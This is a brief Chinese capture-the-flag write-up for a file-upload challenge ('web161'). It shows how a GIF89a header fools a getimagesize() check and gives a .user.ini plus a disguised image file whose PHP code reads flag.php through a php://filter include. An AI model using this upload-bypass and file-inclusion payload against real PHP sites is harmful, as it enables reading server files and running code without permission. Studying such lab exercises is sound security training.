web161笔记（getimagesize()图片文件头检测）

这次上传失败了，尝试在头部加了图片文件头，就过去了，所以这里应该是用了getimagesize()进行检测

getimagesize(): 会对目标文件的16进制去进行一个读取，去读取头几个字符串是不是符合图片的要求

所以在上题的基础上都加个GIF89a图片头就可以了

GIF89a加个图⽚的头欺骗检测

.user.ini

GIF89a

auto_prepend_file=mm.png

 

mm.png

GIF89a

<?=include"ph"."p://filter/convert.base64-encode/resource=../flag.p"."hp"?>

 

然后访问xxxxxx/upload即可

接着进行base64解码即可得到flag